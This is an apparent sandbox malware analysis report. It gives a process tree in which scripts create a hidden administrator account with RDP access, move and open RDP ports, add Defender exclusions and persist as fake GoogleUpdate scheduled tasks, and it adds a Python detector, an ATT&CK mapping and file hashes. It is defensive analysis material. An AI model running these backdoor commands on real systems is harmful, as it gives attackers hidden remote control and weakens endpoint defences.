            [7] C:\Windows\SysWOW64\cmd.exe (PID 2312)
                cmd: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\1172.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs
                - System Location Discovery: System Language Discovery
              [8] C:\Windows\SysWOW64\cscript.exe (PID 1980)
                  cmd: cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\1172.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs
                  - System Location Discovery: System Language Discovery
            [7] C:\Windows\SysWOW64\cmd.exe (PID 1164)
                cmd: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\81.vbs" EGocAeBsIQ UceSTiIhIr "C:\Users\Admin\AppData\Roaming\ALKmVbB\531.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
                - System Location Discovery: System Language Discovery
              [8] C:\Windows\SysWOW64\cscript.exe (PID 2332)
                  cmd: cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\81.vbs" EGocAeBsIQ UceSTiIhIr "C:\Users\Admin\AppData\Roaming\ALKmVbB\531.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
                  - System Location Discovery: System Language Discovery
            [7] C:\Windows\SysWOW64\cmd.exe (PID 1644)
                cmd: C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineUA38"
                - System Location Discovery: System Language Discovery
              [8] C:\Windows\SysWOW64\schtasks.exe (PID 1712)
                  cmd: schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineUA38"
                  - Scheduled Task/Job: Scheduled Task
            [7] C:\Windows\SysWOW64\cmd.exe (PID 1944)
                cmd: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\321.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
              [8] C:\Windows\SysWOW64\cscript.exe (PID 2476)
                  cmd: cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\321.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
                  - System Location Discovery: System Language Discovery
            [7] C:\Windows\SysWOW64\cmd.exe (PID 1280)
                cmd: C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore48"
                - System Location Discovery: System Language Discovery
              [8] C:\Windows\SysWOW64\schtasks.exe (PID 1924)
                  cmd: schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore48"
                  - System Location Discovery: System Language Discovery
                  - Scheduled Task/Job: Scheduled Task
            [7] C:\Windows\SysWOW64\cmd.exe (PID 1556)
                cmd: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\ALKmVbB\FuaxiqhamB.bat EGocAeBsIQ UceSTiIhIr"
                - System Location Discovery: System Language Discovery
              [8] C:\Windows\SysWOW64\cmd.exe (PID 2496)
                  cmd: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
                  - System Location Discovery: System Language Discovery
                [9] C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 1796)
                    cmd: wmic group where sid="S-1-5-32-544" get name /value
                    - System Location Discovery: System Language Discovery
                    - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\SysWOW64\cmd.exe (PID 1808)
                  cmd: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
                  - System Location Discovery: System Language Discovery
                [9] C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 2124)
                    cmd: wmic group where sid="S-1-5-32-555" get name /value
                    - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\SysWOW64\net.exe (PID 2452)
                  cmd: net user EGocAeBsIQ UceSTiIhIr /add
                [9] C:\Windows\SysWOW64\net1.exe (PID 1844)
                    cmd: C:\Windows\system32\net1 user EGocAeBsIQ UceSTiIhIr /add
                    - System Location Discovery: System Language Discovery
              [8] C:\Windows\SysWOW64\net.exe (PID 2212)
                  cmd: net localgroup Administrators EGocAeBsIQ /add
                [9] C:\Windows\SysWOW64\net1.exe (PID 1012)
                    cmd: C:\Windows\system32\net1 localgroup Administrators EGocAeBsIQ /add
                    - System Location Discovery: System Language Discovery
              [8] C:\Windows\SysWOW64\net.exe (PID 1668)
                  cmd: net localgroup "Remote Desktop Users" EGocAeBsIQ /add
                  - Remote Service Session Hijacking: RDP Hijacking
                  - System Location Discovery: System Language Discovery
                [9] C:\Windows\SysWOW64\net1.exe (PID 1520)
                    cmd: C:\Windows\system32\net1 localgroup "Remote Desktop Users" EGocAeBsIQ /add
                    - Remote Service Session Hijacking: RDP Hijacking
                    - System Location Discovery: System Language Discovery
              [8] C:\Windows\SysWOW64\net.exe (PID 2088)
                  cmd: net accounts /maxpwage:unlimited
                  - System Location Discovery: System Language Discovery
                [9] C:\Windows\SysWOW64\net1.exe (PID 2492)
                    cmd: C:\Windows\system32\net1 accounts /maxpwage:unlimited
                    - System Location Discovery: System Language Discovery
              [8] C:\Windows\SysWOW64\reg.exe (PID 2536)
                  cmd: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v EGocAeBsIQ /t REG_DWORD /d "00000000" /f
                  - Hide Artifacts: Hidden Users
                  - System Location Discovery: System Language Discovery
              [8] C:\Windows\SysWOW64\reg.exe (PID 1600)
                  cmd: reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
                  - System Location Discovery: System Language Discovery
              [8] C:\Windows\SysWOW64\netsh.exe (PID 1604)
                  cmd: netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
                  - Modifies Windows Firewall
                  - Event Triggered Execution: Netsh Helper DLL
              [8] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2056)
                  cmd: powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
                  - Command and Scripting Interpreter: PowerShell
                  - Drops file in System32 directory
                  - System Location Discovery: System Language Discovery
                  - Suspicious behavior: EnumeratesProcesses
              [8] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2080)
                  cmd: powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
                  - Command and Scripting Interpreter: PowerShell
                  - Drops file in System32 directory
                  - System Location Discovery: System Language Discovery
                  - Suspicious behavior: EnumeratesProcesses
              [8] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  cmd: powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2888
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2548
-
-
C:\Windows\SysWOW64\timeout.exeTimeout /t 158⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2796
-
-
-
[7] C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID: 2764
[8] C:\Windows\SysWOW64\fsutil.exe
    Command line: fsutil dirty query C:
    - System Location Discovery: System Language Discovery
    PID: 2232
[8] C:\Windows\SysWOW64\sc.exe
    Command line: sc queryex "TermService"
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID: 2216
[8] C:\Windows\SysWOW64\find.exe
    Command line: find "STATE"
    - System Location Discovery: System Language Discovery
    PID: 2436
[8] C:\Windows\SysWOW64\find.exe
    Command line: find /v "RUNNING"
    - System Location Discovery: System Language Discovery
    PID: 3052
[8] C:\Program Files\RDP Wrapper\RDPWInst.exe
    Command line: "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID: 3040
[8] C:\Program Files\RDP Wrapper\RDPWInst.exe
    Command line: "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
    - Server Software Component: Terminal Services DLL
    - Executes dropped EXE
    - Modifies WinLogon
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID: 1752
[9] C:\Windows\system32\netsh.exe
    Command line: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID: 2424
[8] C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
    - System Location Discovery: System Language Discovery
    PID: 1480
[8] C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
    - System Location Discovery: System Language Discovery
    PID: 2876
[8] C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c query session rdp-tcp
    - System Location Discovery: System Language Discovery
    PID: 2732
[8] C:\Program Files\RDP Wrapper\RDPWInst.exe
    Command line: "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
    - Server Software Component: Terminal Services DLL
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID: 1280
[9] C:\Windows\system32\netsh.exe
    Command line: netsh advfirewall firewall delete rule name="Remote Desktop"
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID: 1748
[8] C:\Program Files\RDP Wrapper\RDPWInst.exe
    Command line: "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
    - Server Software Component: Terminal Services DLL
    - Executes dropped EXE
    - Modifies WinLogon
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID: 1600
[9] C:\Windows\system32\netsh.exe
    Command line: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID: 2188
[8] C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
    PID: 2256
[8] C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
    - System Location Discovery: System Language Discovery
    PID: 2140
[8] C:\Windows\SysWOW64\reg.exe
    Command line: reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
    - System Location Discovery: System Language Discovery
    PID: 280
[8] C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
    - System Location Discovery: System Language Discovery
    PID: 352
[9] C:\Windows\SysWOW64\cscript.exe
    Command line: cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
    - System Location Discovery: System Language Discovery
    PID: 3068
[8] C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
    - System Location Discovery: System Language Discovery
    PID: 1328
[9] C:\Windows\SysWOW64\reg.exe
    Command line: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
    - System Location Discovery: System Language Discovery
    PID: 2076
[8] C:\Windows\SysWOW64\reg.exe
    Command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "6.1.7601.17514" /f
    - System Location Discovery: System Language Discovery
    PID: 1356
[8] C:\Windows\SysWOW64\findstr.exe
    Command line: findstr /c:"[6.1.7601.17514]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
    - System Location Discovery: System Language Discovery
    PID: 1312

[7] C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\112.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\795.vbs" "VlVoV1RWQlZWa2hpTWs1Q1dsVktlbE5XUlcxUk1GWk5aRlF4VmxreVZsUldSMnhLWVVWc2VVcHNRalZpUlhSSFVsZHpPV1Y2ClFYZFBWRWt3VGxSVmVFeFVRa1ZTVkVGMENrNUVWWGhOUXpGRFRVVkdSMHhVYXpWT1ZVMTRUMFZOZDFKcVRYcE5XREE5" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
    - System Location Discovery: System Language Discovery
    PID: 2480
[8] C:\Windows\SysWOW64\cscript.exe
    Command line: cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\112.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\795.vbs" "VlVoV1RWQlZWa2hpTWs1Q1dsVktlbE5XUlcxUk1GWk5aRlF4VmxreVZsUldSMnhLWVVWc2VVcHNRalZpUlhSSFVsZHpPV1Y2ClFYZFBWRWt3VGxSVmVFeFVRa1ZTVkVGMENrNUVWWGhOUXpGRFRVVkdSMHhVYXpWT1ZVMTRUMFZOZDFKcVRYcE5XREE5" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
    - System Location Discovery: System Language Discovery
    PID: 1020

[7] C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore26"
    - System Location Discovery: System Language Discovery
    PID: 2132
[8] C:\Windows\SysWOW64\schtasks.exe
    Command line: schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore26"
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID: 2440

[4] C:\Windows\SysWOW64\PING.EXE
    Command line: ping 127.0.0.1 -n 30
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID: 2772

[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k NetworkService
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: LoadsDriver
    PID: 2712

[1] C:\Windows\system32\taskeng.exe
    Command line: taskeng.exe {51878247-83E0-4A77-BC99-21F58D94B95F} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]
    PID: 3028
[2] C:\Windows\System32\WScript.exe
    Command line: C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\795.vbs" VlVoV1RWQlZWa2hpTWs1Q1dsVktlbE5XUlcxUk1GWk5aRlF4VmxreVZsUldSMnhLWVVWc2VVcHNRalZpUlhSSFVsZHpPV1Y2ClFYZFBWRWt3VGxSVmVFeFVRa1ZTVkVGMENrNUVWWGhOUXpGRFRVVkdSMHhVYXpWT1ZVMTRUMFZOZDFKcVRYcE5XREE5
    - Blocklisted process makes network request
    PID: 1740
[2] C:\Windows\System32\WScript.exe
    Command line: C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\531.vbs" EGocAeBsIQ UceSTiIhIr "C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat"
    PID: 3036
[3] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat
    - Drops file in System32 directory
    PID: 2292
[4] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
    PID: 1096
[5] C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic group where sid="S-1-5-32-544" get name /value
    PID: 2460
[4] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
    PID: 888
[5] C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic group where sid="S-1-5-32-555" get name /value
    PID: 2296
[4] C:\Windows\system32\net.exe
    Command line: net user EGocAeBsIQ UceSTiIhIr /add
    PID: 2536
[5] C:\Windows\system32\net1.exe
    Command line: C:\Windows\system32\net1 user EGocAeBsIQ UceSTiIhIr /add
    PID: 2492
[4] C:\Windows\system32\net.exe
    Command line: net localgroup Administrators EGocAeBsIQ /add
    PID: 1280
[5] C:\Windows\system32\net1.exe
    Command line: C:\Windows\system32\net1 localgroup Administrators EGocAeBsIQ /add
    PID: 1580
[4] C:\Windows\system32\net.exe
    Command line: net localgroup Remote Desktop Users EGocAeBsIQ /add
    PID: 580
[5] C:\Windows\system32\net1.exe
    Command line: C:\Windows\system32\net1 localgroup Remote Desktop Users EGocAeBsIQ /add
    PID: 2172
[4] C:\Windows\system32\net.exe
    Command line: net accounts /maxpwage:unlimited
    PID: 1028
[5] C:\Windows\system32\net1.exe
    Command line: C:\Windows\system32\net1 accounts /maxpwage:unlimited
    PID: 2612
[4] C:\Windows\system32\reg.exe
    Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v EGocAeBsIQ /t REG_DWORD /d "00000000" /f
    - Hide Artifacts: Hidden Users
    PID: 2360
[4] C:\Windows\system32\reg.exe
    Command line: reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
    PID: 2080
[4] C:\Windows\system32\netsh.exe
    Command line: netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID: 2820
[4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID: 2920
[4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID: 604
[4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID: 1360
[4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID: 2176
[4] C:\Windows\system32\timeout.exe
    Command line: Timeout /t 15
    - Delays execution with timeout.exe
    PID: 2220

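Both batch runs in the tree above (FuaxiqhamB.bat under the SysWOW64 cmd.exe, and FbUHLyhG.bat launched from the scheduled task through 531.vbs) follow one recipe: create a local user, put it in Administrators and Remote Desktop Users, make the password never expire, hide it from the logon screen via Winlogon\SpecialAccounts\UserList, move RDP to port 13389 and open that port in the firewall, carve Defender exclusions, and install RDP Wrapper so the client SKU accepts the session. The detector below is an added example written for this report; it is not tria.ge code and not code from the sample. It walks a list of process command lines (as a Sysmon Event ID 1 or Security 4688 feed would give them), matches one regex per stage, pulls out the account name, port, task name and Defender changes as IOCs, and returns a verdict only when an account created in the trace was also hidden or granted RDP and RDP was exposed. The stage names, rules and the sample command lines (constructed from the tree above) are this example's own assumptions.

```python
"""Score process command lines for the hidden-RDP-account chain seen in the report.

Added example; not tria.ge code and not code from the sample. Input is a list of
process command lines in execution order (Sysmon Event ID 1 / Security 4688).
"""
import re

# One regex per stage of the chain; named groups carry the IOC to extract.
# The stage names and rules are this example's own assumption, not tria.ge signatures.
_P = {
    "create_user": r'\bnet1?(?:\.exe)?\s+user\s+(?P<user>\S+)\s+\S+\s+/add\b',
    "add_to_group": r'\bnet1?(?:\.exe)?\s+localgroup\s+"?(?P<group>administrators|remote desktop users)"?\s+(?P<user>\S+)\s+/add\b',
    "password_never_expires": r'\bnet1?(?:\.exe)?\s+accounts\s+/maxpwage:unlimited\b',
    # Winlogon\SpecialAccounts\UserList\<name> = 0 hides the account from the logon screen
    "hide_user": r'SpecialAccounts\\UserList"?\s+/v\s+(?P<user>\S+)\s+/t\s+REG_DWORD\s+/d\s+"?0+"?',
    "rdp_port_change": r'WinStations\\RDP-Tcp"?\s+/v\s+"?PortNumber"?\s+/t\s+REG_DWORD\s+/d\s+(?P<port>\d+)',
    "firewall_allow_in": r'netsh\s+advfirewall\s+firewall\s+add\s+rule\b(?=.*\bdir=in\b).*\blocalport=(?P<port>\d+)',
    "defender_tamper": r'(?:Add|Set)-MpPreference\s+-(?P<param>ExclusionPath|ExclusionProcess|SubmitSamplesConsent)\s+"?(?P<value>[^"\s]+)"?',
    "rdpwrap_install": r'RDPWInst(?:\.exe)?"?\s+-i\b',
    "termsrv_tamper": r'RDP-Tcp"?\s+/v\s+(?P<name>SecurityLayer|MinEncryptionLevel)\s+/t\s+reg_dword\s+/d\s+(?P<val>0x[0-9a-f]+|\d+)',
    "scheduled_task_xml": r'schtasks(?:\.exe)?\s+/Create\s+/XML\s+"(?P<xml>[^"]+)"\s+/tn\s+"(?P<task>[^"]+)"',
}
RULES = {stage: re.compile(pat, re.I) for stage, pat in _P.items()}


def classify(cmdline):
    """Return (stage, match) for the first rule that fires, or (None, None)."""
    for stage, rx in RULES.items():
        m = rx.search(cmdline)
        if m:
            return stage, m
    return None, None


def analyze(cmdlines):
    """Walk the command lines in order, collect stages and IOCs, and return a verdict."""
    stages = []
    iocs = {"users_created": [], "group_adds": [], "hidden_users": [], "rdp_port": None,
            "firewall_ports": [], "defender_changes": [], "task_names": [], "termsrv_settings": {}}

    def once(lst, item):  # net.exe re-spawns net1.exe with the same arguments: record each IOC once
        if item not in lst:
            lst.append(item)

    for cl in cmdlines:
        stage, m = classify(cl)
        if stage is None:
            continue
        once(stages, stage)
        g = m.groupdict()
        if stage == "create_user":
            once(iocs["users_created"], g["user"])
        elif stage == "add_to_group":
            once(iocs["group_adds"], (g["user"], g["group"]))
        elif stage == "hide_user":
            once(iocs["hidden_users"], g["user"])
        elif stage == "rdp_port_change":
            iocs["rdp_port"] = int(g["port"])
        elif stage == "firewall_allow_in":
            once(iocs["firewall_ports"], int(g["port"]))
        elif stage == "defender_tamper":
            once(iocs["defender_changes"], (g["param"], g["value"]))
        elif stage == "scheduled_task_xml":
            once(iocs["task_names"], g["task"])
        elif stage == "termsrv_tamper":
            iocs["termsrv_settings"][g["name"]] = int(g["val"], 16 if g["val"].lower().startswith("0x") else 10)

    # A backdoor account is one created in this trace that was then hidden or granted RDP; the
    # chain is complete only if RDP was also exposed (port moved, firewall opened, RDP Wrapper installed).
    created, hidden = set(iocs["users_created"]), set(iocs["hidden_users"])
    rdp_users = {u for u, grp in iocs["group_adds"] if grp.lower() == "remote desktop users"}
    backdoor_users = sorted(created & (hidden | rdp_users))
    rdp_exposed = bool({"rdp_port_change", "firewall_allow_in", "rdpwrap_install"} & set(stages))
    return {"stages": stages, "iocs": iocs, "backdoor_users": backdoor_users,
            "verdict": bool(backdoor_users) and rdp_exposed}


# Constructed sample: the command lines of the first batch run above, in order, plus two benign ones.
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\ALKmVbB\FuaxiqhamB.bat EGocAeBsIQ UceSTiIhIr"',
    r'wmic group where sid="S-1-5-32-544" get name /value',
    r'net user EGocAeBsIQ UceSTiIhIr /add',
    r'C:\Windows\system32\net1 user EGocAeBsIQ UceSTiIhIr /add',
    r'net localgroup Administrators EGocAeBsIQ /add',
    r'net localgroup "Remote Desktop Users" EGocAeBsIQ /add',
    r'net accounts /maxpwage:unlimited',
    r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v EGocAeBsIQ /t REG_DWORD /d "00000000" /f',
    r'reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f',
    r'netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389',
    r'powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"',
    r'powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"',
    r'powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend',
    r'"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o',
    r'netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow',
    r'reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f',
    r'schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore48"',
    r'ping 127.0.0.1 -n 30',
]

if __name__ == "__main__":
    import json
    print(json.dumps(analyze(SAMPLE_CMDLINES), indent=2))
```

Two caveats worth keeping in mind when reading the verdict. The second batch run in the tree writes `net localgroup Remote Desktop Users EGocAeBsIQ /add` without quotes; net.exe takes `Remote` as the group name, so on a real host that step fails while the quoted form in the first run succeeds. The detector matches both because the intent is identical. And because net.exe re-spawns net1.exe with the same arguments, each action appears twice in process telemetry, which is why IOCs are recorded once rather than counted.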
Network
MITRE ATT&CK Enterprise v15 (technique (hits): sub-technique (hits))
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Account Manipulation (1)
- Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)
- Scheduled Task/Job (1): Scheduled Task (1)
- Server Software Component (1): Terminal Services DLL (1)
Privilege Escalation
- Account Manipulation (1)
- Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Defense Evasion
- Hide Artifacts (1): Hidden Users (1)
- Impair Defenses (1): Disable or Modify System Firewall (1)
- Modify Registry (1)
Credential Access
- Credentials from Password Stores (1): Credentials from Web Browsers (1)
- Unsecured Credentials (1): Credentials In Files (1)
Discovery
- Password Policy Discovery (1)
- Permission Groups Discovery (1): Local Groups (1)
- Remote System Discovery (1)
- System Information Discovery (1)
- System Location Discovery (1): System Language Discovery (1)
- System Network Configuration Discovery (1): Internet Connection Discovery (1)
Downloads
- (path not shown)
  Filesize: 12KB
  MD5: b365fde3be7855f4254d1e4bba45d260
  SHA1: b56c6f0402b25c5d68e3a722144f5f4b5bb53d27
  SHA256: 2a175e17c98f9d5f436e23d1c9670f36e54cb82269bccddc87dcfbcfb04d1360
  SHA512: d08e261c0f5c18041d005029cc6ed6119a8cc446607bb5f683a059d1a193d8e04d3e0b52c9f2ea871fcfa8e043c5c2886cfce5419eaf37c39003236f7a399026
- (path not shown)
  Filesize: 115KB
  MD5: 3b18b58b5b9d32e1e8dc3d4f681227cd
  SHA1: fd328b70f225a372903a3b36567779891f39dc32
  SHA256: 79173702b2b38b8f9ad86ca394f3e8921d01c1aa0c7cfb2f64a760e2f2726cdf
  SHA512: ae15406e7e280ee448edfe35da0d5f84d392ebc5b33d730a9b240bdf3ec4f1a0b0e54c03af226cc3eca04ebffd9416a58d4a917dc537ffb0bd370f20417e10a4
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 342B
  MD5: dc7cad1432e19f67280d036c8cfdeee2
  SHA1: 137e5ada9f251f035623181706a5392a5f0428be
